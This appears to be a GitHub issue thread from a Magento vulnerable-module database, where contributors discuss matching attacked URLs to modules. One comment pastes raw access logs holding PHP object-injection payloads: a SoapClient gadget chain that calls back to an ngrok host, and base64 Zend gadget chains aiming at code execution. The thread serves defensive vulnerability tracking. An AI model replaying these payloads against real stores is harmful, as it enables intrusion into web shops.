Open gwillem opened 5 years ago
mpchadwick
commented
5 years ago In cases where the endpoint cannot be correlated back to a specific module what if we extracted the frontName from the relevant URI column and checked for modules that registered the same <frontName>. It's going to be more noisy than using full module identifier + version, but people can manually review the code if it's flagged (and maybe it can help with correlating the endpoints back to specific modules).
rhoerr
commented
5 years ago I brought that up in https://github.com/gwillem/magevulndb/pull/11#issuecomment-457864143. I like the idea but we'll have to normalize the route data for it to work. That might be a feature for the MageRun plugin only; it would drastically increase the size of the single-line command.
gwillem
commented
5 years ago 2018-08-21T02:42:41+00:00 301 178 UA 193.106.30.131 "GET GET /ajax/Showroom/submit/?schedule[time]=O%3A8%3A%22Zend_L
og%22%3A1%3A%7Bs%3A11%3A%22%00%2A%00_writers%22%3Ba%3A1%3A%7Bi%3A1%3BO%3A10%3A%22SoapClient%22%3A3%3A%7Bs%3A3%3A%22uri%2
2%3Bs%3A47%3A%22http%3A%2F%2F369c19f5.ngrok.io%2F%3Fsite1%3Dvictimdomain.com%22%3Bs%3A8%3A%22location%22%3Bs%3A47%3A%22ht
tp%3A%2F%2F369c19f5.ngrok.io%2F%3Fsite1%3Dvictimdomain.com%22%3Bs%3A13%3A%22_soap_version%22%3Bi%3A1%3B%7D%7D%7D HTTP/1.1
" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
185.198.56.4 - [05/Jan/2019:16:44:21 +0000] "GET /customerconnect/rfqs/configureproduct/?options=YTozOntzOjc6InByb2R1Y3QiO3M6MToiMSI7czo2OiJvcHRpb24iO3M6MToiMSI7czoxOiJ4IjtPOjg6IlplbmRfTG9nIjoxOntzOjExOiIAKgBfd3JpdGVycyI7YToxOntpOjA7TzoyMDoiWmVuZF9Mb2dfV3JpdGVyX01haWwiOjU6e3M6MTY6IgAqAF9ldmVudHNUb01haWwiO2E6MTp7aTowO2k6MTt9czoyMjoiACoAX2xheW91dEV2ZW50c1RvTWFpbCI7YTowOnt9czo4OiIAKgBfbWFpbCI7Tzo5OiJaZW5kX01haWwiOjA6e31zOjEwOiIAKgBfbGF5b3V0IjtPOjExOiJaZW5kX0xheW91dCI6Mzp7czoxMzoiACoAX2luZmxlY3RvciI7TzoyMzoiWmVuZF9GaWx0ZXJfUHJlZ1JlcGxhY2UiOjI6e3M6MTY6IgAqAF9tYXRjaFBhdHRlcm4iO3M6NzoiLyguKikvZSI7czoxNToiACoAX3JlcGxhY2VtZW50IjtzOjE0OiJleGl0KCJNeVR5SHkiKSI7fXM6MjA6IgAqAF9pbmZsZWN0b3JFbmFibGVkIjtiOjE7czoxMDoiACoAX2xheW91dCI7czo2OiJsYXlvdXQiO31zOjIyOiIAKgBfc3ViamVjdFByZXBlbmRUZXh0IjtOO319fX0= HTTP/1.1" 403 2988 "" "" 185.198.56.4 - [06/Jan/2019:17:16:07 +0000] "GET /vendors/credit/withdraw/review/?data=YTozOntzOjc6InByb2R1Y3QiO3M6MToiMSI7czo2OiJvcHRpb24iO3M6MToiMSI7czoxOiJ4IjtPOjg6IlplbmRfTG9nIjoxOntzOjExOiIAKgBfd3JpdGVycyI7YToxOntpOjA7TzoyMDoiWmVuZF9Mb2dfV3JpdGVyX01haWwiOjU6e3M6MTY6IgAqAF9ldmVudHNUb01haWwiO2E6MTp7aTowO2k6MTt9czoyMjoiACoAX2xheW91dEV2ZW50c1RvTWFpbCI7YTowOnt9czo4OiIAKgBfbWFpbCI7Tzo5OiJaZW5kX01haWwiOjA6e31zOjEwOiIAKgBfbGF5b3V0IjtPOjExOiJaZW5kX0xheW91dCI6Mzp7czoxMzoiACoAX2luZmxlY3RvciI7TzoyMzoiWmVuZF9GaWx0ZXJfUHJlZ1JlcGxhY2UiOjI6e3M6MTY6IgAqAF9tYXRjaFBhdHRlcm4iO3M6NzoiLyguKikvZSI7czoxNToiACoAX3JlcGxhY2VtZW50IjtzOjE0OiJleGl0KCJNeVR5SHkiKSI7fXM6MjA6IgAqAF9pbmZsZWN0b3JFbmFibGVkIjtiOjE7czoxMDoiACoAX2xheW91dCI7czo2OiJsYXlvdXQiO31zOjIyOiIAKgBfc3ViamVjdFByZXBlbmRUZXh0IjtOO319fX0= HTTP/1.1" 403 2988 "" "" 109.237.138.20 - [06/Jan/2019:18:23:37 +0000] "GET /comm/returns/configureproduct/?options=YTozOntzOjc6InByb2R1Y3QiO3M6MToiMSI7czo2OiJvcHRpb24iO3M6MToiMSI7czoxOiJ4IjtPOjg6IlplbmRfTG9nIjoxOntzOjExOiIAKgBfd3JpdGVycyI7YToxOntpOjA7TzoyMDoiWmVuZF9Mb2dfV3JpdGVyX01haWwiOjU6e3M6MTY6IgAqAF9ldmVudHNUb01haWwiO2E6MTp7aTowO2k6MTt9czoyMjoiACoAX2xheW91dEV2ZW50c1RvTWFpbCI7YTowOnt9czo4OiIAKgBfbWFpbCI7Tzo5OiJaZW5kX01haWwiOjA6e31zOjEwOiIAKgBfbGF5b3V0IjtPOjExOiJaZW5kX0xheW91dCI6Mzp7czoxMzoiACoAX2luZmxlY3RvciI7TzoyMzoiWmVuZF9GaWx0ZXJfUHJlZ1JlcGxhY2UiOjI6e3M6MTY6IgAqAF9tYXRjaFBhdHRlcm4iO3M6NzoiLyguKikvZSI7czoxNToiACoAX3JlcGxhY2VtZW50IjtzOjE0OiJleGl0KCJNeVR5SHkiKSI7fXM6MjA6IgAqAF9pbmZsZWN0b3JFbmFibGVkIjtiOjE7czoxMDoiACoAX2xheW91dCI7czo2OiJsYXlvdXQiO31zOjIyOiIAKgBfc3ViamVjdFByZXBlbmRUZXh0IjtOO319fX0= HTTP/1.1" 403 2988 "" ""